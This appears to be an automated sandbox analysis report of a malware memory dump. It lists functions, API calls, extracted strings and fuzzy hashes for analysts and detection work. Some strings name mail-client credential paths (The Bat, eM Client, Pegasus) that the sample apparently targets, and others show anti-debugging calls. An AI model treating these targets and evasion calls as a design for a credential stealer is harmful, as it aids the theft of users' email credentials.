Opcode Fuzzy Hash: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
Instruction Fuzzy Hash: EC92CBB1728322EBD724AE28CA9163DBBE1EB94750F158D1FF185CB290D670E491DB07

Function 04226508 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 391libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(fltl), ref: 04226645

Strings

dll, xrefs: 04226628
fltl, xrefs: 04226640, 04226644
A8r, xrefs: 0422667C
ib.d, xrefs: 04226630

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: A8r$dll$fltl$ib.d
API String ID: 1029625771-252788044
Opcode ID: 2039658f1a3f0192b30e54c42d1fc0f10245b4772019d9c249726f779701915c
Instruction ID: 07efba29e14e43a613ee0d169dc99ef5c8fc7475050680d38b3f41efd3dcc968
Opcode Fuzzy Hash: 2039658f1a3f0192b30e54c42d1fc0f10245b4772019d9c249726f779701915c
Instruction Fuzzy Hash: F2E1A473B39222BBCB24AE18C78522D7BE1EF90744F145D1EE095CB294E6B4F5909B43

Function 04206C08 Relevance: 8.3, Strings: 5, Instructions: 2052COMMON

Download Yara Rule

Strings

EeS, xrefs: 04206DE6
VL6T, xrefs: 04207928
UL6T, xrefs: 04207294
EeS, xrefs: 042072AA
VL6T, xrefs: 04208B83

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: EeS$EeS$UL6T$VL6T$VL6T
API String ID: 0-1377693644
Opcode ID: 822facb60093e5c78bbde4163aef7a75eac0453c728f865f1413c4f3083f18a3
Instruction ID: 3afb7a84ec999f3e643c3c43a920778a79b1d3074ef0197ad5c21f6fde40e59b
Opcode Fuzzy Hash: 822facb60093e5c78bbde4163aef7a75eac0453c728f865f1413c4f3083f18a3
Instruction Fuzzy Hash: 60E24BF1F301066BEF28AA948C8557FB9F4DF00700F288826E905E66D2E674FA54D797

Function 0422A5D4 Relevance: 8.3, Strings: 6, Instructions: 794COMMON

Download Yara Rule

Strings

y_B>, xrefs: 0422A864
y_B>, xrefs: 0422A495
ST4, xrefs: 0422A4D2
?, xrefs: 0422AA5E
x_B>, xrefs: 0422A449
TT4, xrefs: 0422A8B8

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: ?$ST4$TT4$x_B>$y_B>$y_B>
API String ID: 0-2374627004
Opcode ID: 02d0fd0443d9d51e028c47f058a80f2cd0009247c9e0929960f9bfe9abe723b5
Instruction ID: fb8d951185fc021a9d5acbff8cea610f7200aa7de14add9e93e4172ce2b318e5
Opcode Fuzzy Hash: 02d0fd0443d9d51e028c47f058a80f2cd0009247c9e0929960f9bfe9abe723b5
Instruction Fuzzy Hash: 62523BB1F3022BABDF28DF98CA4257DB671FB14300F544626D012EAAA0E7B5B541C787

Function 0422AFE9 Relevance: 8.2, Strings: 6, Instructions: 749COMMON

Download Yara Rule

Strings

)lu, xrefs: 0422B4A0
Mail Clients\The Bat\Local, xrefs: 0422B2A7, 0422B2AC, 0422B2BF, 0422B2D2, 0422B77F, 0422B784, 0422B797, 0422B880, 0422B9DE, 0422B9E3, 0422B9F6, 0422BA09, 0422BB1B, 0422BB70
(lu, xrefs: 0422B1D3
Mail Clients\The Bat\AppData, xrefs: 0422B312, 0422B317, 0422B32A, 0422B33D, 0422B350, 0422B363, 0422B376, 0422B400, 0422B405, 0422B418, 0422B7D2, 0422B7D7, 0422B7EA, 0422B7FD
n_v, xrefs: 0422B4AB
n_v, xrefs: 0422B261

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: (lu$)lu$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$n_v$n_v
API String ID: 0-3310705457
Opcode ID: 7bf9955990434cfb00a5bd9f7622437a54179299fee655f26a020719653d2004
Instruction ID: 94191128c085cde86b96c65ed76dd9a157b6bec3d037a9133f5753495ebc0445
Opcode Fuzzy Hash: 7bf9955990434cfb00a5bd9f7622437a54179299fee655f26a020719653d2004
Instruction Fuzzy Hash: A942D7B1F3012A7ADF24DE588E5567E7F74EB00344F240926E415F62A1E365BB80C7A3

Function 042026DD Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 655COMMON

Download Yara Rule

Strings

UL6T, xrefs: 042028A4
VL6T, xrefs: 04202C70

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: UL6T$VL6T
API String ID: 0-3136271418
Opcode ID: 8359da0d40d20ee8e83e49935313afc930907d22c7ff5b46e8d0eb1bbd30fa68
Instruction ID: 01c1213bef5866a9263d520c993ea4fa7c49fd82f2901951b9c435f6c82f1ad9
Opcode Fuzzy Hash: 8359da0d40d20ee8e83e49935313afc930907d22c7ff5b46e8d0eb1bbd30fa68
Instruction Fuzzy Hash: BD32C8B5F3410ACBDF24DE58898917EB6F0AB04350F248957D816EB2D3E674EE4096E2

Function 04224EF4 Relevance: 7.4, Strings: 5, Instructions: 1174COMMON

Download Yara Rule

Strings

fS)), xrefs: 042259B6
T5 S, xrefs: 04225174
]cnq, xrefs: 04225774
U5 S, xrefs: 04225AF0
U5 S, xrefs: 0422637B

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleName
String ID: T5 S$U5 S$U5 S$]cnq$fS))
API String ID: 2106025501-2879408294
Opcode ID: 4cc957b51dab68ea6b59bc913a1bf740dbf24a7c456668d412c3ef1561a4ad06
Instruction ID: 8bd9b6fefe0b10d12a6878d444b7395462c1b02a59bed5863410f180ba52476e
Opcode Fuzzy Hash: 4cc957b51dab68ea6b59bc913a1bf740dbf24a7c456668d412c3ef1561a4ad06
Instruction Fuzzy Hash: B4A270B1728311ABDB289F18C69422DBAE0BB85754F548D1EF099CB360E6B4F481DB43

Function 0421EE52 Relevance: 6.8, Strings: 5, Instructions: 537COMMON

Download Yara Rule

Strings

n_v, xrefs: 0421F222
(lu, xrefs: 0421F0D8
)lu, xrefs: 0421F1AF
n_v, xrefs: 0421F2F4
)lu, xrefs: 0421F2E9

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: (lu$)lu$)lu$n_v$n_v
API String ID: 0-3830700584
Opcode ID: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
Instruction ID: a90aad1f9ce4ceb8edf9a75303dd05e6c3ac0452cc3f745fbd4978e07ea941f6
Opcode Fuzzy Hash: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
Instruction Fuzzy Hash: E722A1B4F2424ACBCF24CF98C9905BEBBF0EB28314F25455AD525EB271D370A542CB92

Function 0424F4AB Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0424F538

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 12bee11bf7391676ae73bf0f68abedb6b2fa3ae6387d4d45c0890e18c1b165f5
Instruction ID: 779e557c9c9b088074bf7c34a8543ab410b13080c94a2e324292f3f4ff170428
Opcode Fuzzy Hash: 12bee11bf7391676ae73bf0f68abedb6b2fa3ae6387d4d45c0890e18c1b165f5
Instruction Fuzzy Hash: 47B15B32F202469FEB19CF68C9807FEBBA5EFC9354F1641A6D915AB241D274F901CB60

Function 04252223 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 042522BE
FindNextFileW.KERNEL32(00000000,?), ref: 04252339
FindClose.KERNEL32(00000000), ref: 0425235B
FindClose.KERNEL32(00000000), ref: 0425237E

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
Instruction ID: 117129d92e1e5b36cf366f87f5e213ba268871734a89e08f059cff1725c8afe6
Opcode Fuzzy Hash: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
Instruction Fuzzy Hash: 0341A471B1022AFADB20DFA4DC88AAAB378EB84204F0441D5ED05D7194FA70AE84CF75

Function 042167AF Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 837COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0421698B

Strings

0, xrefs: 042170B0
8, xrefs: 042170A8

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: 0$8
API String ID: 4218353326-46163386
Opcode ID: 38b8936eb4140eae30aee7312caf29dcbdd29765460d38eb1dc49951334f1799
Instruction ID: c9892142ea6023f293ded1132443d12fbd1d015c87addfd107d468fea6a9c957
Opcode Fuzzy Hash: 38b8936eb4140eae30aee7312caf29dcbdd29765460d38eb1dc49951334f1799
Instruction Fuzzy Hash: 7C7234716183419FD714CF18C880AAEBBE2AFD8354F04892DF99987361D771E958CB92

Function 0423D0FC Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0423D108
IsDebuggerPresent.KERNEL32 ref: 0423D1D4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0423D1F4
UnhandledExceptionFilter.KERNEL32(?), ref: 0423D1FE

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
Instruction ID: 5b9321f01d49e09d62f90b93f42e5523b2e2bfb2e3491e52a6843812127096a7
Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
Instruction Fuzzy Hash: 0C314BB5D1121DDBEB20DF60D989BCCBBB8AF08705F1040AAE40CA7250EBB19A85CF55

Function 04206472 Relevance: 5.4, Strings: 4, Instructions: 445COMMON

Download Yara Rule

Strings

Y=`, xrefs: 04206577
Ku^%, xrefs: 04206B34
Y=`, xrefs: 04206831
Ku^%, xrefs: 04206853

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: Ku^%$Ku^%$Y=`$Y=`
API String ID: 0-3617128223
Opcode ID: 5f34cb384d69458e94695c2cbe6bafde1a605cae2f8802c300460b8e96db7d5c
Instruction ID: 26b44049f6169eeff4c4035e2360c8f1f44e536defe586e34ff16b41b6787472
Opcode Fuzzy Hash: 5f34cb384d69458e94695c2cbe6bafde1a605cae2f8802c300460b8e96db7d5c
Instruction Fuzzy Hash: A7F1F6B0F3020A8FCF249F98C88167D7AE4BB14310F24C926E411EA6E2E775F565DB52

Function 0422D221 Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

Mail Clients\eM Client, xrefs: 0422D225
^^4, xrefs: 0422D594
]^4, xrefs: 0422D257
^^4, xrefs: 0422D476

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: Mail Clients\eM Client$]^4$^^4$^^4
API String ID: 0-1928883120
Opcode ID: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
Instruction ID: 8a0ceb9f399fd4a03d7338a195b05b05f48bfd935f6f2ab205e8421203266694
Opcode Fuzzy Hash: 2b4910dd263b016b495e14fa66466277187321ac52993c0523f68307dfe2152f
Instruction Fuzzy Hash: FDE13AB1F3016BABEF288E58CF856BE76B4AB14304F244626D015FB350E675EA41C793

Function 0423B5C9 Relevance: 5.0, APIs: 1, Strings: 2, Instructions: 550stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(0045FAC2,0045FAC2,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0423BA0C

Strings

VL6T, xrefs: 0423BD5C
VL6T, xrefs: 0423B954

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: VL6T$VL6T
API String ID: 1586166983-2204272895
Opcode ID: b34f7b6829543c5bcafa32b40e3420d98b0dff8f829e495a6d6cd6807b993e14
Instruction ID: f3977b164b1b8f8a2a4f253e1082d05a7bcfec30144387130bf1dc950821ddd5
Opcode Fuzzy Hash: b34f7b6829543c5bcafa32b40e3420d98b0dff8f829e495a6d6cd6807b993e14
Instruction Fuzzy Hash: AB12B7F5F2411A8BCF28CE5C84952BD7EB0BB44742F64052AD516EF362E275FA40CB92

Function 0424E5A2 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,04205EEC), ref: 0424E69A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04205EEC), ref: 0424E6A4
UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,04205EEC), ref: 0424E6B1

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: fddfd219bb87237c86172eb2c7764efb5dcc82193680edb944fc16078175a50e
Instruction ID: ea44e08286307ac2787e62328fb5bbaaadf267314a11dd2f17ba5bb294662092
Opcode Fuzzy Hash: fddfd219bb87237c86172eb2c7764efb5dcc82193680edb944fc16078175a50e
Instruction Fuzzy Hash: 4E31C47491122D9BDB21DF24D988BDDBBB8FF08710F5041EAE41CA7260EB70AB858F45

Function 04224E54 Relevance: 4.5, APIs: 3, Instructions: 32fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000200), ref: 04224E75
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 04224E89
CloseHandle.KERNEL32(00000000), ref: 04224E95

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleName
String ID:
API String ID: 2106025501-0
Opcode ID: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
Instruction ID: 2309360618dbe5dbb7b84db7c9e5663a4bf00e78cf96d6090d7d7e19771b5e4a
Opcode Fuzzy Hash: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
Instruction Fuzzy Hash: 5FF0A031211130BBD2345B29ED4CF577F6CEF86B70F014615F619AB1E0D2B4A802C6D5

Function 0423048F Relevance: 4.5, Strings: 3, Instructions: 717COMMON

Download Yara Rule

Strings

VL6T, xrefs: 04230BA5
UL6T, xrefs: 042306FC
VL6T, xrefs: 04230A79

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: UL6T$VL6T$VL6T
API String ID: 0-1166735070
Opcode ID: 9bed48560ca3b384b9a9f564c2ae7e0eec34a31771338bf98d0d52593d9e9e81
Instruction ID: 57158fd3a55bf7c5751267557abde61375d9f5853315d593ec9440fdfc641bfc
Opcode Fuzzy Hash: 9bed48560ca3b384b9a9f564c2ae7e0eec34a31771338bf98d0d52593d9e9e81
Instruction Fuzzy Hash: 4C42F6F1F3021A9BEF24CF9889855BE76B4AF04711F240616E915FB394E370AA50D7A3

Function 04205D11 Relevance: 4.2, Strings: 3, Instructions: 448COMMON

Download Yara Rule

Strings

n_v, xrefs: 04205DCB
n_v, xrefs: 04205F00
,, xrefs: 04205E85

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: ,$n_v$n_v
API String ID: 0-3754569955
Opcode ID: 0e10baba5f1820c9e62b13837b958635acf04d9a09fea5eb7d3276a35e9ff41f
Instruction ID: e4f6b20cb47a34c95043c5b5e3b0e52a964cc1f4eed46b8ae77a69de95011386
Opcode Fuzzy Hash: 0e10baba5f1820c9e62b13837b958635acf04d9a09fea5eb7d3276a35e9ff41f
Instruction Fuzzy Hash: 27F13C70F301179BDF28DF58C8995BDBAF0AB45700F648527E501EA3E2E770A691CB92

Function 0422BC2C Relevance: 4.2, Strings: 3, Instructions: 436COMMON

Download Yara Rule

Strings

Ku^%, xrefs: 0422BF1D
Mail Clients\Pegasus, xrefs: 0422BCDC, 0422BCE1, 0422BCF4, 0422BD07, 0422BD1A, 0422C092, 0422C097, 0422C0AA, 0422C0BD, 0422C0D0
Ku^%, xrefs: 0422C07C

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: Ku^%$Ku^%$Mail Clients\Pegasus
API String ID: 0-3776256347
Opcode ID: 69303447eaede18a72e1c4aaef7c08798843526f7a0a7bd99bf296903903c389
Instruction ID: 75bb47c0046e82cb5d8f77c6b786c0a6feb619236060b937def8105ba338cc34
Opcode Fuzzy Hash: 69303447eaede18a72e1c4aaef7c08798843526f7a0a7bd99bf296903903c389
Instruction Fuzzy Hash: B8E12BB1F3022A6FCF248E99CA815BF7E74AF45340F640526E515EB360EB64F980C796

Function 0422270A Relevance: 4.0, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

M%, xrefs: 042229E4
9a%^, xrefs: 04222819
M%, xrefs: 042228C3

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: 9a%^$M%$M%
API String ID: 0-3204844187
Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
Instruction ID: 3f1a40093561ab62c6037d3a3fe0f6d8e127bb996cd25e23597de10fd2f9b1ab
Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
Instruction Fuzzy Hash: 9E817275F24639EBCF24CF5CC6C06ACBBB0AF04300F2495D6D415E7264E276AA81CB66

Function 04215EE5 Relevance: 3.9, Strings: 3, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

Strings

3333, xrefs: 04215F3A
UUUU, xrefs: 04215F65
UUUU, xrefs: 04215F31

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: 3333$UUUU$UUUU
API String ID: 0-1588839328
Opcode ID: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
Instruction ID: 9c3401715b1138bf0b6f1dba8a5fe4e19509ad712ec8accfd20d14bb821bbe56
Opcode Fuzzy Hash: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
Instruction Fuzzy Hash: D541A1B17246058FCB188F59C8C475277E6AFD8320F5981AAED058F39AE7B4D8C5CB80

Function 0420092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0420095F
l, xrefs: 04200966
GetProcAddress., xrefs: 042009DC, 042009DF, 042009E4

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 146e09ecf9d5328e4e0b558be605c6a6ff4e14acec4e23645b533189d3af5a7f
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: EB316BB6A10609DFEB10CF99D880BADBBF5FF08724F14804AD541A7251D7B1FA45CBA4

Function 0423BF0B Relevance: 3.1, Strings: 2, Instructions: 611COMMON

Download Yara Rule

Strings

y_B>, xrefs: 0423C272
y_B>, xrefs: 0423C66A

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: y_B>$y_B>
API String ID: 0-2639510964
Opcode ID: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
Instruction ID: 6f4d6bcd46b9811782b05ad19dbe69c72d2ecb36cfc4f64e7f410fd5d3bfa855
Opcode Fuzzy Hash: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
Instruction Fuzzy Hash: A532B5F2F3521A8BDF24CE5988442BDBA70AB14312F195526F419FB251E3B4FB418F92

Function 042178B1 Relevance: 2.4, APIs: 1, Instructions: 917COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 042179DA

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a052847ad604f4f6aac9229b62f97eaa10969126bdecdebac7787c9539404c8d
Instruction ID: d57a2cd1f7b7a0ac6c1182c6f4e4659b5d3890612aab583da7e98d2e301bc91e
Opcode Fuzzy Hash: a052847ad604f4f6aac9229b62f97eaa10969126bdecdebac7787c9539404c8d
Instruction Fuzzy Hash: 55823171618341AFDB14CF18C880BABBBE5FF98304F44892DF989872A1D775E954CB92

Function 04227C47 Relevance: 1.8, Strings: 1, Instructions: 509COMMON

Download Yara Rule

Strings

y_B>, xrefs: 04227F51

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: y_B>
API String ID: 0-1404922283
Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
Instruction ID: d337f8c5cf4d74f36eed5cd917acbd99e9e63cd7e0449af4773da6cf00eadc98
Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
Instruction Fuzzy Hash: D6123C7172C362ABCB24AF28D6D053DB6E1AFC8750F254A1EE196CB350E674E480DB07

Function 0425216F Relevance: 1.7, APIs: 1, Instructions: 158fileCOMMON

Download Yara Rule

APIs

Part of subcall function 04250597: RtlAllocateHeap.NTDLL(00000008,?,04236A8C), ref: 042505D8

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 042522BE
FindNextFileW.KERNEL32(00000000,?), ref: 04252339
FindClose.KERNEL32(00000000), ref: 0425235B

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Find$File$AllocateCloseFirstHeapNext
String ID:
API String ID: 2963102669-0
Opcode ID: 11130e8ba43ef9a754539bc983f7f1652457a0f25efbe84c150eaa5e199ad3f8
Instruction ID: df804637c4e6e6c88a963aa48284f3ff5929b364430614300e8ad3f0bb05121c
Opcode Fuzzy Hash: 11130e8ba43ef9a754539bc983f7f1652457a0f25efbe84c150eaa5e199ad3f8
Instruction Fuzzy Hash: 9541EA7671021AEFEB14AEA8DC84DBFB369EB80358F1445A9ED15D7190FA30BD448A70

Function 042425B1 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

0, xrefs: 0424273F

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d368bac3811ff53457a2cb311bf3a0af827fa309b1fb3d430375599c5b749556
Instruction ID: 2f83fa9bf28ec3b60dd73e12b34cc50636138c12e646a290bffd0e2dd2e1947c
Opcode Fuzzy Hash: d368bac3811ff53457a2cb311bf3a0af827fa309b1fb3d430375599c5b749556
Instruction Fuzzy Hash: 77C1FD74B20606CFDB2DCF6AC48067EBBA1EFC5394F144699E8929B290D770B845CB71

Function 04224D8B Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNEL32(?), ref: 04224DF7

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
Instruction ID: 8527217ce4d0d0c3e470629f962d3987323b2ed86d2de5aad596d46d146cd0ba
Opcode Fuzzy Hash: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
Instruction Fuzzy Hash: 79115EB1900B84CFD721CF699845B9AFBF4FB49710F04C62AE4A997740D3786805CFA1

Function 0421E957 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

U, xrefs: 0421ECAA

Memory Dump Source

